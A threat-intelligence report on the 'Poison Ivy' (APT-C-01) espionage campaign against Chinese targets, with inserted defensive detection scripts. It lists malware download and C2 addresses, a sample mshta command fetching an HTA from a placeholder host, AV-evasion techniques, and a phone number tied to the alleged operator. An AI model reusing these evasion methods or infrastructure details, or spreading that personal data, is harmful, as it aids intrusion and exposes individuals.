September 21, 2018

Poison Ivy Group and the Cyberespionage Campaign Against Chinese Military and Government

Chapter 1 Overview

1. Main Findings

Through its research, 360 Helios Team has found that, since 2007, the Poison Ivy Group has carried out an 11-year cyber espionage campaign against key Chinese units and departments, such as national defense, government, science and technology, education and maritime agencies. The group mainly targets the military industry, Sino-US relations, cross-strait relations and ocean-related fields. This indicates that the group's interests are similar to those of the OceanLotus APT group we published on previously.

360 Helios Team captured the first Trojan of the Poison Ivy Group in December 2007. In the following 11 years we have captured 13 versions of malicious code, involving 73 samples. In the initial attack, the group mainly used spear phishing emails. Before the attack, the target was investigated in depth and carefully selected, and content closely related to the target's industry or field (specific conference materials, research papers or announcements) was used to construct the bait files and emails. The lure documents include 10 exploit document samples, one of which exploits a 0day vulnerability. Infections of this Trojan are distributed across 31 provincial-level administrative regions. There are 59 C&C domain names, which resolve to addresses in 4 different countries or regions.

In this cyber espionage campaign that lasted for 11 years in China, the following points in time are worthy of attention:

  • In December 2007, the Trojan associated with the group was first discovered, involving marine-related fields (suspected to be related to a large shipping company).
  • In March 2008, a key laboratory (a scientific research institution) of a university in China was attacked.
  • In February 2009, attacks against the military industry began (a well-known military journal).
  • In October 2009, the Trojan added a special method of defeating static scanning (reversed API strings); the method was used in most versions of the Trojan and was still in use in 2018.
  • In December 2011, the Trojan added a special method of defeating dynamic detection (invalid API parameters); the method was used in most versions of the Trojan and was still in use in 2015.
  • In February 2012, the first modified version of backdoor 1, based on the zxshell code, was discovered. Its key function is to steal document files such as .doc, .ppt, .xls and .wps.
  • In March 2013, intense attacks were launched against the Chinese Academy of Sciences and a number of national ministries and commissions in the fields of science and technology, maritime affairs, etc.
  • In October 2013, a watering hole attack was carried out on a Chinese government website.
  • In May 2014, the revised version 2 of the zxshell-based backdoor 1 was discovered. In addition to the functions of modified version 1, searches for keywords such as "military (军)", "aviation (航)" and "report (报告)" were added.
  • On September 12, 2014, events and samples related to CVE-2014-4114 (a 0day vulnerability) were first discovered.
  • On October 14, 2014, iSIGHT released the relevant report and disclosed CVE-2014-4114 (0day vulnerability). On the same day, Microsoft released the relevant security bulletin.
  • On February 25, 2015, an attack on a military industry association (national defense technology) and the Chinese Academy of Engineering was detected. Kanbox (酷盘) samples were discovered.
  • In October 2017, a CVE-2017-8759 exploit document was used to launch a spear phishing attack on a large media agency website and an individual working in Quanzhou.
  • In April 2018, 360 Threat Intelligence Center disclosed the group's malicious code exploiting CVE-2017-8759.
  • In May 2018, the actor launched attacks against several maritime organizations such as shipbuilding companies and port operating companies.

Note: The first-attack times above are based on the statistics we currently hold. They do not mean that we know all of the organization's attacks and behaviors.

2. About the Codename of the Group

Since 2015, APT research in China has gradually started and accelerated. Following the exposure of APT organizations such as "OceanLotus" and "LanBao Mushroom", the Poison Ivy Group (APT-C-01) is another APT organization that launches persistent attacks against government, military and maritime organizations to steal sensitive information.

This cyberespionage group was discovered independently by 360, and part of the information was disclosed previously. The code name follows 360's naming standard for APT organizations.

360 Threat Intelligence Center named the APT-C-01 organization "Poison Ivy" mainly for the following reasons. First, the organization used Poison Ivy Trojans in several attacks. Second, the organization used a cloud disk as a springboard to transmit information, which resembles the way vines climb across a wall. Under the 360 Threat Intelligence Center's naming rules for APT organizations (see the report China APT Annual Report 2016), and considering the vine plants common in the areas associated with the group, APT-C-01 is named "Poison Ivy".

In addition, Antiy Lab revealed the APT organization "Green Spot" on September 19, 2018. According to the mutual recognition agreement between 360 Threat Intelligence Center and Antiy Lab, the “Poison Ivy” (APT-C-01) and “Green Spot” are different names for the same group. Therefore, we have also announced our discovery.  

Chapter 2 Purposes and Victims

1. Purposes

The main purpose of the attacks is to steal data, mainly documents, from the Chinese government and scientific research institutions. The actor searched for the following keywords and extensions:

  • Key words:

“201”,“2014”,“2015年”,“报”,“报告”,“兵”,“部队”,“对台”,“工作”,“规划”,“国”,“国际”,“航”,“合作”,“机”,“机场”,“基地”,“极地”,“军”,“军事”,“科技”,“密”,“内部”,“十”,“十三”,“台”,“台湾”,“铁路”,“无人”,“项”,“雪”,“研”,“运输”,“战”,“站”,“中”

  • Extensions:

“doc”,“ppt”,“xls”,“pdf”,“rtf”,“rar”,“wps”,“doc”,“ppt”,“xls*”

  • Related information of the stolen user hosts:

MAC Info: MAC information, including IP address, gateway, etc.

Host Info: Host information, including operating system information, host name, local user name, etc.

Process Info: current process

Version Info: version information, including Microsoft Office and Microsoft Internet Explorer version

Disk Info: Disk Information

Figure 1 User host information (example)

Figure 2 Infected users by month (July 2014 - June 2015)

2. Industrial Distribution

Mainly involved industries: national defense, government, science and technology, education, etc.

Related fields: maritime (South China Sea, East China Sea, mapping), military, Taiwan-related issues (cross-strait relations), Sino-US relations

3. Geographical Distribution

Figure 3 Distribution map of infected areas in China (July 2014-June 2015)

Figure 4 Infected areas in China

Chapter 3 11 Years’ Persistent Campaign

1. Initial Attack

1) Spear Phishing Email

Spear phishing email is a common APT attack method, used mainly in the initial phase. Attackers start the attack with a mail whose body or attachment carries malicious code, commonly exploit documents. About 90% of the attacks are of this kind.

This section mainly introduces two attack methods: e-mail carrying vulnerability files and e-mail carrying binary executable files.

A. Carrying vulnerable Word document

Figure 5 Carrying vulnerable files Case 1 - Word document

Figure 6 Carrying vulnerable files Case 1 - zipped file

Figure 7 Carrying vulnerable files Case 1 - CHM file

Figure 8 Carrying vulnerable files Case 1 - Email

Figure 9 Carrying vulnerable files Case 2 - Email

Figure 10 Carrying vulnerable files Case 2 - Vulnerable Word Document

B. Carrying PE binary executable

Figure 11 Carrying PE binary executable - email

Figure 12 Carrying PE binary executable - attached zipped file

Figure 13 Carrying PE binary executable - bait document released by the Trojan

The attack actor usually sends the phishing email through webmail and a related tool (PHPMailer).

C. Carrying self-extracting file

The attackers send a compressed RAR self-extracting program to the target mailbox.

The Trojan is in the attachment.

The file is actually a RAR self-extracting (SFX) program whose parameters are set so that, when the victim clicks the exe, it directly runs the batch file inside.

The default batch command moves the Trojan body to the temp directory, executes it, and then deletes the batch file.

2) Disguised extensions via RLO

Figure 14 Disguised file extension (RLO)
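The RLO trick shown in Figure 14 relies on the Unicode RIGHT-TO-LEFT OVERRIDE character (U+202E) making a file browser draw the tail of a name backwards, so an executable appears to end in ".doc". The following added example (not code from the report or from 360) shows how a defender can check attachment names for this: it strips bidirectional control characters to recover the extension the OS will actually dispatch on, approximates what the user would see, and flags a mismatch. The sample file names are constructed for the example.

```python
import unicodedata
from pathlib import PurePath

# Unicode bidirectional controls that can change how a file name is displayed.
# U+202E RIGHT-TO-LEFT OVERRIDE (RLO) is the one used for the extension trick.
BIDI_CONTROLS = frozenset(
    "\u202a\u202b\u202c\u202d\u202e"   # LRE, RLE, PDF, LRO, RLO
    "\u2066\u2067\u2068\u2069"         # LRI, RLI, FSI, PDI
    "\u200e\u200f"                     # LRM, RLM
)
RLO = "\u202e"


def strip_bidi(name: str) -> str:
    """Remove every bidi formatting character from a file name."""
    return "".join(ch for ch in name if ch not in BIDI_CONTROLS)


def true_extension(name: str) -> str:
    """Extension the OS actually dispatches on: the text after the last '.',
    ignoring formatting characters (they are not part of the extension)."""
    return PurePath(strip_bidi(name)).suffix.lower()


def displayed_name(name: str) -> str:
    """Approximation of what a bidi-aware file browser renders: everything
    after an RLO is drawn right-to-left, i.e. visually reversed."""
    if RLO not in name:
        return strip_bidi(name)
    head, _, tail = name.partition(RLO)
    return strip_bidi(head) + strip_bidi(tail)[::-1]


def analyze_filename(name: str) -> dict:
    """Flag a name whose visible extension differs from its real extension."""
    controls = [f"U+{ord(c):04X} {unicodedata.name(c)}"
                for c in name if c in BIDI_CONTROLS]
    shown = displayed_name(name)
    shown_ext = PurePath(shown).suffix.lower()
    actual_ext = true_extension(name)
    return {
        "displayed": shown,
        "displayed_ext": shown_ext,
        "actual_ext": actual_ext,
        "bidi_controls": controls,
        "suspicious": bool(controls) and shown_ext != actual_ext,
    }


# Constructed sample names (not from the report). The first is stored as
# "report<RLO>cod.exe": a file browser renders it as "reportexe.doc",
# but Windows opens it as an .exe.
SAMPLES = ["report\u202ecod.exe", "report.doc"]

if __name__ == "__main__":
    for n in SAMPLES:
        print(analyze_filename(n))
```

Mail gateways and EDR rules can apply the same check to attachment names and to file-creation events; the presence of any bidi control in a name is already unusual enough to log, and a mismatch between the displayed and the real extension is a direct indicator of this disguise.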

3) Disguised icons and extensions

Figure 15 Disguised icon and hidden extension Case 1

Figure 16 Disguised icon and hidden extension Case 2

Figure 17 Disguised icon and hidden extension Case 2 - Lure document released by the Trojan

2. Vulnerability Analysis

1) CVE-2012-0158

Reference: https://technet.microsoft.com/zh-cn/library/security/ms12-027.aspx and http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0158

A. Execution flow of the vulnerable file

Figure 18 Execution flow of the vulnerability (CVE-2012-0158)

B. MHT format

Figure 19 Comparison of the two formats of the vulnerable files (upper: MHT, lower: RTF)

CVE-2012-0158 is mainly exploited through the RTF and DOC formats. This attack instead saves the DOC file in MHT format, so anti-virus software whose format pre-check does not match the file cannot detect it. The detection rate of these exploit files was low at the time.

C. Shellcode comparison

Comparing the shellcode of the exploit documents shows that their structure and functions are basically the same. From this we infer that the exploit documents were developed by the same hacker group.

2) CVE-2014-6352 (0day)

A. Background

CVE-2014-4114 was disclosed in a report released by iSIGHT on October 14, 2014. The report describes a 0day vulnerability (CVE-2014-4114) exploited in cyber espionage mainly against NATO, the EU, and telecommunications and energy related fields. Microsoft also released the relevant security bulletin on October 14.

CVE-2014-6352 is a vulnerability that bypasses the CVE-2014-4114 patch. Microsoft's previous fix added a MakeFileUnsafe call after the INF and EXE files are generated, setting the files' zone information so that a security alert is shown when the exploit installs the INF. The CVE-2014-6352 sample abandons the INF-based installation and executes the EXE directly. Because on Windows versions newer than XP the second item of an executable's right-click menu runs it with administrator privileges, no security reminder appears if the user has turned off UAC. Microsoft's fix for CVE-2014-6352 therefore adds a security prompt to that context-menu action.

Reference: https://technet.microsoft.com/zh-cn/library/security/ms14-060.aspx and https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4114

Reference: https://technet.microsoft.com/zh-cn/library/security/3010060.aspx, https://technet.microsoft.com/zh-cn/library/security/ms14-064.aspx and http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6352

B. Related introductions in this operation

Figure 20 Vulnerability Document (CVE-2014-6352) attribution related information

Figure 21 CVE-2014-6352 related key time points

The sample in this operation does not use an INF as the springboard but uses the EXE directly. After CVE-2014-4114 is triggered, the second item of the right-click menu is invoked by default; under Windows 7 this normally runs the file with administrator privileges. If the second item is some other option, the malware path is passed to it as a parameter, which causes some compatibility problems. The execution effect is shown in the following figure:

Figure 22 Schematic diagram of the vulnerability implementation

Upgrade of the vulnerability document version

Figure 23 Sandworm vulnerability document sample (version A)

Figure 24 Sandworm vulnerability document sample (version B)

Figure 25 Poison Ivy vulnerable document sample (version C)

3) CVE-2017-8759

A. Background

CVE-2017-8759 is a 0day vulnerability disclosed by FireEye on September 12, 2017. Microsoft released a related security bulletin on September 12.

Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8759

B. Related information in the action

The RTF file automatically updates the linked object through the objautlink and objupdate control words. After the vulnerability is triggered, mshta.exe executes the remote HTA file.

The HTA file is an HTML page with an embedded malicious VBS, and the VBS calls PowerShell to download the subsequent EXE loader.

3. Persistent penetration

1) RAT Evolution

RAT: Remote Access Trojan

Figure 26 Related RAT evolution timeline

A total of 11 versions of the relevant backdoors were involved. The proportions are as follows:

Figure 27 The relevant proportion ratio of these 11 versions of RAT

2) Analysis of these 13 versions of RAT

Figure 28 RAT related version classification

A. Poison Ivy

The Poison Ivy Trojan is essentially a Remote Access Trojan (RAT); FireEye has published a dedicated analysis of it. The Poison Ivy Trojan in this report corresponds to version 2.3.2. The Poison Ivy generator has 10 versions in total, starting from 1.0.0, with 2.3.2 the latest. The generator can produce both EXE and shellcode output; the Trojans in this case are in shellcode form. Most of the related mutexes are the default ")! VoqA.I4".

Figure 29 Configuration Interface Screenshot to Poison Ivy generator

Figure 30 PI Relationship between Outer Layer and Inner Layer

The Poison Ivy Trojan obtains the shellcode from the outer-layer parent by XORing with key1 and then key2.

Figure 31 Poison Ivy Trojan (three) related XOR decryption comparison

There is a list of related Poison Ivy Trojan configuration information (ID and corresponding password).

B. ZxShell

ZxShell was used continuously by the APT-C-01 organization from December 2007 until October 2014. Because the versions differ substantially, ZxShell can be regarded as two versions: the internally published version and the open source version. The first refers to the ZxShell Trojan used by the organization from 2007 to 2012. The second refers to the ZxShell Trojan used from 2012 to 2014; it was developed from the open source version, so we call it the secondary development version. Both the internally published version and the open source version are version 3.0. The former was not widely publicized but is rich in features; the latter's source code is widely distributed, and many functions were removed compared with the previous versions. For a more detailed analysis of ZxShell, please refer to the Cisco report Threat Spotlight: Group 72, Opening the ZxShell.

From the table above it can be seen, based on research into the corresponding versions of the Trojan, that the number of instructions keeps decreasing from version to version, meaning the Poison Ivy Group removed more and more existing features. Only 13 instructions are retained in the secondary development version, yet new instructions and features have been added. The new features in the secondary development version are shown in the following table:

Secondary Development Version vs. Open Source Version

The samples we captured are modifications of the ZxShell source code and retain the original structure. ZxShell itself has more than twenty instructions. The samples keep some of them but drop a large number, such as installation/startup, cloning a system account, shutting down the firewall, port scanning and proxy server functions, and add the "IEPass" command.

Figure 32 Screenshots to IEPass Directive related Code

Related sub-version iterative updates (secondary development version)

  1. Compared with the previous version, the changes are mainly in the information collection part: the time range for collecting documents is expanded from half a year to 4 years, the ".wps" extension is added, and the original ".doc" is changed to ".doc*".
  2. The time range for stealing documents is changed back to half a year. The file packing part is modified to remove the file version information.
  3. The encrypted monitoring log is now written to adovbs.mof; monitoring of configuration strings is added; Profiles.log is added to record system and file information.
  4. The code functions are updated less than in the previous version, and the positions of related functions are changed to evade anti-virus software.

Figure 33 Screenshot to relevant keyword code

ZxShell related configuration list

C. Kanbox version

The related sample disguises itself with a folder icon. After execution it drops the "svch0st.exe" Trojan file together with a normal folder and a ".doc" document file to confuse the user.

"svch0st.exe" is a Trojan that communicates over the SSL protocol. Every hour it runs all of its Trojan procedures, which pack and upload all the information on the computer (file directory, system version, network card information, process list, specified packaged files, network information and disk information) together with files matching related keywords (such as "Taiwan", "Army" and "War" in Chinese) to the Kanbox account the attacker registered in advance, over SSL.

The C&C address is a Kanbox address. Files are uploaded via the API provided by Kanbox.

API upload interface: https://api-upload.kanbox.com/0/upload/%s/%s?bearer_token=%s https://auth.kanbox.com/0/token

Figure 34 Screenshot to the Kanbox API address code

Figure 35 Screenshot to the official website home page of Kanbox

Kanbox version related configuration information list

D. Unknown RAT

The unknown RAT is divided into two versions by its outer dropper: the folder version and the bundle version. The RAT itself has four versions, all of them unknown remote access Trojans.

a) Folder Version

Figure 36 Related changes after the implementation of the unknown RAT file version

b) Bundle version

67d5f04fb0e00addc4085457f40900a2
└─Atnewyrr.exe~tmp.zip
│  newyrr.exe
│
└─doll.exe
            aaa.vbs
            b.bat
            server.exe

Figure 37 Digital signature used in unknown RAT

E. Other

The backdoor programs used by the APT-C-01 organization in related actions also include three other RATs: gh0st, XRAT and HttpBot.

3) Payload analysis of script loading

At the beginning of 2018, 360 Threat Intelligence Center discovered a control domain (http://updateinfo.servegame.org) used by the APT-C-01 organization to control and distribute the attack payload. In this attack activity, the organization used a CVE-2017-8759 exploit document to download a malicious HTA file and execute script commands that download and run the subsequent attack payload module.

A. Dropper Analysis

The Dropper program is downloaded and executed by the exploit document attached to the spear phishing email.

It downloads the malicious HTA file, which runs a PowerShell command to download the Loader program, save it as officeupdate.exe and execute it.
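The infection chain described in the CVE-2017-8759 section and again here (exploit document opened in Office, then mshta.exe fetching an HTA, then PowerShell downloading the loader) leaves a distinctive parent/child trail in process-creation telemetry. The following added example, which is not code from the report or from 360, reconstructs process ancestry from a Sysmon-style event list and alerts on any script host whose ancestors include an Office application. The event lines, host names and paths are constructed placeholders, not indicators taken from the report.

```python
import csv
import io
from pathlib import PureWindowsPath

# Parent applications that should not normally spawn script hosts.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
# Script hosts seen in the chain described above (mshta.exe -> powershell.exe).
SCRIPT_HOSTS = {"mshta.exe", "powershell.exe", "wscript.exe", "cscript.exe"}

# Constructed process-creation events in a Sysmon-like CSV layout
# (utc_time,pid,ppid,image,command_line). Hosts and paths are placeholders.
SAMPLE_EVENTS = """\
2018-05-02 09:12:01,3104,2880,C:\\Windows\\explorer.exe,explorer.exe
2018-05-02 09:12:07,4412,3104,C:\\Program Files\\Microsoft Office\\Office14\\WINWORD.EXE,"WINWORD.EXE /n invitation.rtf"
2018-05-02 09:12:09,4520,4412,C:\\Windows\\System32\\mshta.exe,"mshta.exe http://placeholder.invalid/update.hta"
2018-05-02 09:12:10,4588,4520,C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe,"powershell.exe -w hidden -f C:\\Users\\u\\AppData\\Local\\Temp\\stage.ps1"
2018-05-02 09:13:44,4701,3104,C:\\Windows\\System32\\mshta.exe,"mshta.exe C:\\Tools\\admin.hta"
"""


def parse_events(text: str) -> dict:
    """Index events by pid; the image path is reduced to a lower-case file name."""
    events = {}
    for row in csv.reader(io.StringIO(text)):
        if len(row) != 5:
            continue
        ts, pid, ppid, image, cmd = row
        events[int(pid)] = {
            "time": ts, "pid": int(pid), "ppid": int(ppid),
            "name": PureWindowsPath(image).name.lower(), "cmd": cmd,
        }
    return events


def ancestry(events: dict, pid: int) -> list:
    """Process names from pid up to the last parent we have an event for."""
    chain, seen = [], set()
    while pid in events and pid not in seen:   # seen-set guards pid reuse loops
        seen.add(pid)
        chain.append(events[pid]["name"])
        pid = events[pid]["ppid"]
    return chain


def find_office_script_chains(events: dict) -> list:
    """Alert on every script host that has an Office application as an ancestor."""
    alerts = []
    for pid, ev in sorted(events.items()):
        if ev["name"] not in SCRIPT_HOSTS:
            continue
        chain = ancestry(events, pid)
        if any(name in OFFICE_APPS for name in chain[1:]):
            alerts.append({"pid": pid, "time": ev["time"],
                           "chain": " <- ".join(chain), "cmd": ev["cmd"]})
    return alerts


if __name__ == "__main__":
    for alert in find_office_script_chains(parse_events(SAMPLE_EVENTS)):
        print(alert)
```

Walking the full ancestry rather than only the direct parent is what catches the PowerShell stage here: its parent is mshta.exe, and only the grandparent is WINWORD.EXE. The stand-alone mshta.exe launched from Explorer in the sample is deliberately not flagged, so the rule stays quiet on ordinary HTA usage.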

B. Loader Analysis

According to the strings in the Loader program, its author named it SCLoaderByWeb, version 1.0, which literally means a shellcode loader that fetches its payload from the web. It is used to download and execute shellcode.

The Loader first tries to connect to a common URL to check network connectivity. If there is no network, it retries every 5 seconds until a connection succeeds. It then downloads the payload from hxxp://updateinfo.servegame.org/tiny1detvghrt.tmp, as shown in the figure:

It then checks whether the file was downloaded successfully; if not, it sleeps for 1 second and tries to download the payload again:

After the download, each byte of the downloaded file is XOR-decrypted with 0xac, 0x5c and 0xdd in turn (which is equivalent to XORing each byte with 0x2d, since 0xac ^ 0x5c ^ 0xdd = 0x2d), as shown in the figure:

The decrypted shellcode is then executed in a newly created thread, as shown in the figure:

C. Shellcode Analysis

The .tmp files hosted at the distribution domain are XOR-encoded shellcode. The following figure shows the tinyq1detvghrt.tmp file downloaded from the distribution domain, which is data XOR-encrypted with 0x2d.
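The loader section above describes the payload being XOR-decrypted byte by byte with 0xac, 0x5c and 0xdd in turn, and this section describes the hosted .tmp files as XOR 0x2d data. Both statements are the same thing, because successive single-byte XORs fold into one key. The following added example (not code from the report or from 360) implements the layered decode, verifies that it collapses to a single 0x2d pass, and shows how an analyst can recover the key from a captured file when the start of the plaintext is known. The payload bytes are a constructed stand-in, not real shellcode.

```python
from functools import reduce

# Key bytes the loader applies one after another, as described in the report.
LAYERED_KEYS = (0xAC, 0x5C, 0xDD)


def fold_keys(keys) -> int:
    """Successive single-byte XORs collapse into one key: k1 ^ k2 ^ k3."""
    return reduce(lambda a, b: a ^ b, keys, 0)


def xor_layered(data: bytes, keys=LAYERED_KEYS) -> bytes:
    """Apply the loader's layers literally, one full pass per key."""
    out = bytes(data)
    for k in keys:
        out = bytes(b ^ k for b in out)
    return out


def xor_single(data: bytes, key: int) -> bytes:
    """Equivalent one-pass decode. XOR is an involution, so this also encodes."""
    return bytes(b ^ key for b in data)


def recover_single_byte_key(encoded: bytes, known_prefix: bytes):
    """If the plaintext start is known (a familiar shellcode prologue, say),
    the key is the XOR of the first byte pair; accept it only if it explains
    the whole known prefix, otherwise the guess was wrong."""
    if not encoded or not known_prefix or len(encoded) < len(known_prefix):
        return None
    key = encoded[0] ^ known_prefix[0]
    if xor_single(encoded[:len(known_prefix)], key) == known_prefix:
        return key
    return None


# Constructed stand-in for a downloaded .tmp payload (not real shellcode),
# encoded the way the loader expects so the decode path can be exercised.
PLAINTEXT = b"constructed-sample-payload\x00\x01\x02"
ENCODED = xor_single(PLAINTEXT, 0x2D)

if __name__ == "__main__":
    print(hex(fold_keys(LAYERED_KEYS)))
    print(xor_layered(ENCODED) == PLAINTEXT)
    print(recover_single_byte_key(ENCODED, b"constructed"))
```

Because the three layers reduce to one byte, a scanner does not need to replicate the loader's loop: a single-byte XOR brute force over 256 keys, scored against an expected prologue or a known Poison Ivy configuration layout, is enough to unpack any further .tmp files from the same distribution point.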

After decryption, the shellcode is found to have been generated by Poison Ivy:

By analyzing and testing the shellcode format generated by the Poison Ivy Trojan and comparing it with the shellcode used in the attack payload, we obtained the position and meaning of each configuration field in the shellcode.

The format of the shellcode configuration fields is as follows:

When the code that obtains the kernel32 base address in Poison Ivy was analyzed, it was found to be incompatible with Windows 7: under Windows 7 the second module in the InitializationOrderModule list is KernelBase.dll, so the code actually obtains the base address of KernelBase.

Since Poison Ivy is no longer updated, the attack organization patched the code that obtains the kernel32 base address so that the shellcode can run on later versions of Windows.

The improvement method is as follows:

  1. A jump instruction to the end of the shellcode is inserted before the original kernel32 base address code, and the patch code is appended at the end;
  2. The patch code first obtains the base address of the second module in the InitializationOrderModule list (kernel32.dll under Windows XP, kernelbase.dll under Windows 7);
  3. It then obtains the address of LoadLibraryExA from that second module (both kernel32.dll under Windows XP and kernelbase.dll under Windows 7 export this function);
  4. Finally, it obtains the base address of kernel32 by calling LoadLibraryExA.

The attacker's patch to the shellcode makes it usable on different Windows versions.

The function of this shellcode is mainly the remote access Trojan's control module: C2 communication and remote control. Here we simulate the Trojan's check-in process under Windows 7.

Decrypting the other shellcode files hosted on the control domain, the check-in information of the obtained samples is as follows:

4) Latest analysis of RAT

In May 2018, we discovered a new Trojan program used by the APT-C-01 Group in its attacks against relevant maritime agencies and units in China. It was mainly delivered as a RAR self-extracting program attached to a spear phishing email; when the victim double-clicks the attachment, the Trojan runs.

At the entry of the remote control module, malicious code is executed in the catch block by deliberately triggering an exception, as shown in the figure:

The same method is then used to trigger another exception and enter the second layer of code:

It then initializes a socket and establishes a connection with the C2:

It connects to port 8080 of zxcv201789.dynssl.com to create the C&C channel:

The code that sends the check-in packet to the control server contains the check-in password asd88, as shown in the figure:

Finally it enters the functional loop of the remote control:

The command tokens and their functions are as follows:

  • 0x04 Close the connection
  • 0x41 Remote shell
  • 0x42 Process enumeration
  • 0x43 End the specified process
  • 0x51 Enumerate drive
  • 0x52 List specified directory
  • 0x53 Upload files to the victim
  • 0x54 Download file from victim
  • 0x55 Delete Files
  • 0x56 Remote execution

The strings in this Trojan are stored reversed and are restored with the C library function strrev. The same method was used in this organization's Trojan from 2015.

4. C&C analysis

1) Dynamic domain

Figure 38 DynDNS Hosting Providers (ChangeIP)

Figure 39 DynDNS Hosting Providers ratio graph

2) The meaning of the domain name

The following are the dynamic subdomain names registered by the attack organization; we list them here for research and analysis of the meaning of the mappings.

3) Cloud drive

The Kanbox sample currently contains two tokens.

Through analysis of the Kanbox API, we obtained information about the cloud disk account used by the group, including the China Mobile phone number used to register the account.

{"status":"ok","email":"","phone":"15811848796","spaceQuota":1700807049216,"spaceUsed":508800279,"emailIsActive":0,"phoneIsActive":1}

Some results of the correlation analysis we conducted on this mobile phone number:

Figure 40 Google search results

Figure 41 Weifengtang website user information 1

Figure 42 Weifengtang website user information 2

Figure 43 Alipay and WeChat information of the number owner

4) Third party blog service

Figure 44 Screenshot of the blog part

The picture above shows the Poison Ivy Group relying on a third-party blog to deliver malicious code. A blog's domain name is usually on the whitelist of firewalls and various security software, so storing malicious code in a blog helps evade anti-virus software.

5) C&C IP(ASN)

Figure 45 C&C IP Correlation Analysis

6) Other

The domain name gaewaaa.upgrinfo.com has relevant whois information, as shown below.

Figure 46 Domain registration information

Another domain name is moneyaaa.beijingdasihei.com

5. Correlation Analysis

1) Overall Correlation

We correlated the raw attack emails, exploit files, 3 different RATs (ZxShell, Poison Ivy and the Kanbox version), and the related domain names, check-in passwords, file extensions, compressed package passwords and keywords across the different resources.

Figure 47 Overall relationship between different resources

2) RAT iterative upgrade (Countermeasures)

Typical methods of the correlated samples:

A. Development environment

Except for the XRAT backdoor, all other versions from 2008 to 2015 were written in C++.

B. Encryption

The following versions all use two rounds of XOR decryption before executing the malicious code: the 2011 version, memcache version, Voice64 version, HTTPBOTS version, Kanbox version, PI and XRAT. In addition, the cloud drive version also encrypts the files.

Figure 48 unknown RAT2011 (left), Kanbox (right)

C. Stealing function

The ZxShell backdoor uses a custom stealing function that is very similar to the one used by the 2015 cloud drive version: the A drive (usually the floppy disk drive) is excluded from the search, the disks are traversed in advance, the drive list is stored in memory, and the drive list in memory is read via the pointer plus 5.

Figure 49 ZxShell (left), Kanbox (right)

D. Shellcode backdoor

Comparing the shellcode injected into the system by the 2011 version (Poison Ivy) with the 2015 cloud drive version, the shellcode backdoors are highly similar and the address in the last line is also padded with 0x30.

Figure 50 unknown RAT2011 version (left), Kanbox (right)

Related shellcode Trojan file detection result (0 detections): https://www.virustotal.com/en/file/8cee670d7419d1fd0f8f0ac6a2bd981593c2c96ca0f6b8019317cf556337cfa8/analysis/

E. Child file name (outer layer)

Comparing the 2009 version with the 2011 version, the child file released by the virus is named ~work.tmp, the format string is "%s\%s.bak", and the code similarity is extremely high. ~tmp.tmp, ~tmp.zip and ~mstmp.cpt are used as temporary file names of the Trojan (2007 to 2009).

Figure 51 unknown RAT2009 (left), unknown RAT2011 (right)

F. Bypass Anti-Virus –API string reverse order against static scan

The HttpBot, Kanbox, XRAT and RAT (2007-2011 versions) Trojans store API names as reversed strings in the code. When the Trojan executes, the reversed string is converted back to the normal API name by the _strrev function, and GetProcAddress is called to obtain the API address dynamically. Reversing the API string makes string-based detection harder, and because the API address is resolved at run time it does not appear in the PE's static import information, which makes API-based detection harder too. Poison Ivy is known to have used this technique from 2009 through 2018.

Figure 52 Unknown RAT2009 (upper), Kanbox (below)
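The reversed-string trick described above hides API names from a plain string scan, but the reversed form is itself a fixed, searchable artifact: "GetProcAddress" becomes "sserddAcorPteG" and never appears that way in benign code. The following added example, which is not code from the report or from 360, scans a byte buffer for the reversed forms of API names that these samples resolve at run time (including GetClientRect, whose misuse is discussed in the next section) and emits an equivalent YARA rule. The API list is an assumption based on the names the report mentions plus common loader imports, and the sample buffer is constructed for the example.

```python
# API names resolved at run time by the samples described in the report, plus
# common loader imports (assumed list). Any name that appears reversed in a
# binary is a strong static indicator of the _strrev technique.
API_NAMES = (
    "GetProcAddress", "LoadLibraryA", "VirtualAlloc", "CreateThread",
    "GetClientRect", "WriteProcessMemory", "CreateRemoteThread", "InternetOpenA",
)


def reversed_needles(names=API_NAMES) -> dict:
    """Map each reversed ASCII form (what _strrev would undo) to the API name."""
    return {name[::-1].encode("ascii"): name for name in names}


def find_reversed_api_strings(data: bytes, names=API_NAMES) -> list:
    """Return (offset, api_name) for every reversed API string in the buffer."""
    hits = []
    for needle, name in reversed_needles(names).items():
        start = 0
        while (idx := data.find(needle, start)) != -1:
            hits.append((idx, name))
            start = idx + 1
    return sorted(hits)


def to_yara_rule(names=API_NAMES, rule_name="reversed_api_strings",
                 threshold=2) -> str:
    """Emit an equivalent YARA rule so the same check can run in a scanner.
    Requiring several hits keeps a single accidental match from firing."""
    lines = [f"rule {rule_name}", "{", "    strings:"]
    for i, (needle, name) in enumerate(reversed_needles(names).items()):
        lines.append(f'        ${"s"}{i} = "{needle.decode()}" ascii  // {name}')
    lines += ["    condition:", f"        {threshold} of them", "}"]
    return "\n".join(lines)


# Constructed sample buffer (not bytes from any report sample): two reversed
# API names amid filler, plus a normal, un-reversed name that must not match.
SAMPLE = (b"\x00" * 4 + b"sserddAcorPteG\x00" + b"hello world\x00"
          + b"AyrarbiLdaoL\x00" + b"VirtualAlloc\x00")

if __name__ == "__main__":
    for offset, api in find_reversed_api_strings(SAMPLE):
        print(f"0x{offset:04x} {api}")
    print(to_yara_rule())
```

Run against a dumped PE section or a decrypted payload, the hit offsets point straight at the resolver routine, which is usually the best place to start reversing one of these samples; the YARA output can be dropped into an existing rule set with the threshold tuned to taste.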

G. Bypass Anti-Virus– pass error API parameters against dynamic scan:

The Kanbox, Poison Ivy, XRAT, ZxShell and unknown RAT (2007-2011 versions) Trojans use the GetClientRect function to counter dynamic scanning by anti-virus software. The prototype is BOOL GetClientRect(HWND hWnd, LPRECT lpRect); it retrieves a window's client coordinates, the first parameter being the target window handle and the second the returned coordinate structure. The Trojan deliberately calls GetClientRect with 0 as the first parameter, so on a real Windows system the call always fails and returns 0. Many anti-virus products use dynamic scanning (mostly heuristic detection) in which the emulation of GetClientRect does not account for invalid parameters, so the emulated call always succeeds and returns non-zero. The Trojan can thus distinguish the anti-virus virtual environment from the user's real system and bypass detection; the Kaspersky virtual machine heuristic scanning environment can be detected this way. Poison Ivy is known to have used this technique from 2011 through 2018.

